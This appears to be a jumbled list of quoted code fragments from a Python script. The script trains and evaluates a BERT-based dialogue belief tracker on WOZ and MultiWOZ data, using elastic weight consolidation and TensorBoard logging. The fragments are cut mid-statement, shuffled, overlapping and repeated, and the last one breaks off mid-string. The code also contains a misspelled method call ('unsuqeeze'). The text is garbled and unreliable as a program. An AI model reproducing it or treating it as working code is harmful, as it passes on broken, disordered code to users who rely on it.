parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to allow", "* prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples", "multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss", "%d) ' % (label, label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx =", "= tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the sequence length. input_ids += [0] *", "True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a)", "logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc))", "total input sequence length after WordPiece tokenization. \\n\" \"Sequences longer than this will", "dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\" Num examples", "1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed manually", "euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total", "Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d,", "parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set", "improve fp16 numeric stability. Only used when fp16 set to True.\\n\" \"0 (default", "value labels num_labels = [len(labels) for labels in label_list] # Number of labels", "% (sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" %", "loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples +=", "loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean()", "use distributed and fp16 training.\") model = DDP(model) elif n_gpu > 1: model", "ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7',", "[ l * num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn", "if args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([", "or an excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\")", "= convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\"", "improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training to perform linear learning rate warmup", "prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev = 0", "= _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" %", "in loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l", "'#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for the belief tracking dataset", "prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval()", "if args.do_train: logger.info(\"Training...\") global_step = 0 last_update = None best_loss = None ####", "eval_accuracy += acc.item() * nb_eval_ex if loss_slot is not None: if eval_loss_slot is", "parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether", "for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig =", "'.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\",", "slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str,", "size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5,", "class Processor(DataProcessor): \"\"\"Processor for the belief tracking dataset (GLUE version).\"\"\" def __init__(self, config):", "else: raise NotImplementedError() # sorting the ontology according to the alphabetic order of", "help=\"Do not train BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The", "test set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output", "writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file) print(class_correct) print(class_count)", "epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc,", "= int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx", "input_len, label_ids, _ = batch if n_gpu == 1: loss_, loss_slot, acc, acc_slot,", "# trained slots in previous tasks class InputFeatures(object): \"\"\"A single set of features", "truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int,", "already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name =", "nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if (step + 1) % args.gradient_accumulation_steps ==", "default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size", "= TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data)", "lines class Processor(DataProcessor): \"\"\"Processor for the belief tracking dataset (GLUE version).\"\"\" def __init__(self,", "logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as", "eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot * nb_eval_ex return eval_loss,", "= [] self.prev_slot = [] self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')])", "logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\" % \"", "ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology =", "dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f", "if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({}) already exists and", "task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard: summary_writer", "target_label_list # All slot value labels num_labels = [len(labels) for labels in label_list]", "type=float, help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of", "InputExample(object): \"\"\"A single training/test example for simple sequence classification.\"\"\" def __init__(self, guid, text_a,", "optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ###############################################################################", "= %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for full", "if drawfig == True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores =", "= os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0 total_slot_class_acc =", "= os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results", "> len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions ############################################################################### def accuracy(out, labels):", "this data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab", "from BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args, num_labels, device) if args.fp16: model.half() #", "prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\",", "writer: logger.info(\"***** Eval results *****\") for key in sorted(result.keys()): logger.info(\" %s = %s\",", "prev_acc_slot * prev_num_valid_turn else: for i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] +", "incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for dialog in", "Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device),", "eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for full data eval_sampler =", "class for data converters for sequence classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets", "acc, _, pred_slot = model(input_ids, input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item()", "else: raise ValueError('nbt type should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import", "ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _", "random seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed)", "- 1) assert len(features) % max_turn_length == 0 if prev_dialogue_idx is None or", "torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0): eval_examples =", "total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if", "else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu =", "type should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model =", "def __init__(self, config): super(Processor, self).__init__() import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\":", "= num_train_steps if args.local_rank != -1: t_total = t_total // torch.distributed.get_world_size() if args.fp16:", "'#' will be replaced with '[SEP]' after tokenization. text_a = line[2] + \"", "else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes the distributed", "optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1 # Perform evaluation on", "% slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps +=", "all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\")", "slots in this training task self.prev_label = prev_label # trained slots in previous", "state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids, label_len =", "Load a trained model that you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list", "acc_slot * num_valid_turn prev_dev_loss_slot = [ l * prev_num_valid_turn for l in prev_loss_slot]", "== True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot,", "prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids", "nbt, rename_list.append(key) for key in del_list: del ptr_model[key] for key in rename_list: new_key", "dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def", "args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name))", "None or prev_dialogue_index != line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index =", "action='store_true', help=\"Whether not to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for", "in n for nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for", "optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank !=", "## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer,", "None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad()", "accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\",", "curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and (prev_dialogue_idx", "input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features)", "utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)", "training.\") model = DDP(model) elif n_gpu > 1: model = torch.nn.DataParallel(model) # Prepare", "loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc =", "model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") == -1 and", "vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x in range(num_labels[i])] for i", "dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss, 6) if last_update is None or dev_loss", "if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) + 1 input_ids", "label_ids, _ = batch if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _", "= model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_ +", "= %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run prediction for", "target_slot=target_slot_id) loss_ = loss_.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model)", "label_list] # Number of labels of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id =", "Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if epoch > 100 and last_update +", "from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1: raise", "= prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\",", "max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len =", "type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size for", "prev_dialogue_idx = None all_padding = [0] * max_seq_length all_padding_len = [0, 0] max_turn", "self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot)) logger.info('Processor:", "total input turn length. \\n\" \"Sequences longer than this will be truncated, and", "a list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list) def _hard_coding_label(label): return", "or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args, num_labels, device) if args.fp16:", "default=0.1, type=float, help=\"Proportion of training to perform linear learning rate warmup for. \"", "eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples =", "warm up BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if", "used when fp16 set to True.\\n\" \"0 (default value): dynamic loss scaling.\\n\" \"Positive", "optimizer.zero_grad() global_step += 1 # Perform evaluation on validation dataset model.eval() dev_loss =", "= prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot /", "%H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A", "slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'),", "BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot", "import operator from tqdm import tqdm, trange import numpy as np import torch", "set of features of data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids =", "in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i],", "= np.argmax(out, axis=1) return np.sum(outputs == labels) def warmup_linear(x, warmup=0.002): if x <", "text_a self.text_b = text_b self.label = label # Target slots in this training", "in previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present", "tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\"", "model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0, nslot): fig, axs = plt.subplots(nturn,", "tasks class InputFeatures(object): \"\"\"A single set of features of data.\"\"\" def __init__(self, input_ids,", "[] self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x)", "# Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler,", "pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close()", "slot in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for the training", "max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len", "> 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval and not args.do_analyze: raise", "target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc,", "acc.mean() acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc *", "tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) + 1 input_ids =", "return [ self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return", "slot in range(0, nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot)", "sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain in", "os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu == 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file)", "parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where the model predictions and checkpoints", "8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu()", "input_ids, input_len, label_ids, prev_label_ids = batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0)", "= %d\", len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\" Num steps =", "type=int, default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of", "and evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list = [] rename_list = [] for", "slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc)", "optimizer.step() optimizer.zero_grad() global_step += 1 # Perform evaluation on validation dataset model.eval() dev_loss", "global_step += 1 # Perform evaluation on validation dataset model.eval() dev_loss = 0", "None, None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"):", "input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot", "bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where the model predictions", "* num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot =", "args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\" Num examples = %d\", len(dev_examples))", "% max_turn_length == 0 if prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids,", "len(label_token_ids) label_padding = [0] * (max_seq_length - len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids)", "in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for i, l in enumerate(loss_slot):", "Processor processor = Processor(args) prev_label_list = processor.get_prev_labels() # Slot value labels of Previous", "= all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length,", "xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x in", "prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) >", "range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot =", "!= -1).sum().item() nslot = label_ids.size(2) for slot in range(nslot): for turn in range(nturn):", "include at least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker", "* args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list,", "for (i, line) in enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) #", "model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot idx to train model.", "device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes the distributed backend which", "max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions", "accumulation=False): \"\"\"Creates examples for the training and dev sets.\"\"\" prev_dialogue_index = None examples", "0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev =", "prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None: # for", "i in range(len(num_labels))] class_count = [[0 for x in range(num_labels[i])] for i in", "== -1: train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler,", "== 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)", "for n, p in param_optimizer if not any(nd in n for nd in", "x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b = None if", "# Slot value labels of Previous task target_label_list = processor.get_labels() # Slot value", "% (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]: turn index if accumulation:", "dev_acc_slot / nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None:", "prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)):", "return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\"", "= [ line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label))", "task # tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if not os.path.exists(vocab_dir): raise", "+ tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0]", "in enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue index,", "simple sequence classification.\"\"\" def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None): self.guid = guid", "Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT", "self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples(", "label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length:", "for f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long)", "slot: %s label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show()", "on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you are using", "tokens_a = tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len", "be True.\") ############################################################################### # Load data ############################################################################### # Get Processor processor = Processor(args)", "args.bert_model) if not os.path.exists(vocab_dir): raise ValueError(\"Can't find %s \" % vocab_dir) tokenizer =", "= TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank == -1: train_sampler = RandomSampler(train_data) else:", "global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step)", "= 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether", "for f in features], dtype=torch.long) # reshape tensors to [batch, turn, word] all_input_ids", "acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss += prev_loss.item() *", "set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory", "%d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for full data", "dev_acc = 0 dev_loss_slot, dev_acc_slot = None, None nb_dev_examples, nb_dev_steps = 0, 0", "= dev_loss / nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss /", "all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids, all_input_len,", "text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length):", "to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training to perform", "\"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1", "=='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker", "converters for sequence classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection of", "# line[0]: dialogue index, line[1]: turn index if accumulation: if prev_dialogue_index is None", "and fp16 training.\") model = DDP(model) elif n_gpu > 1: model = torch.nn.DataParallel(model)", "for this data set.\"\"\" raise 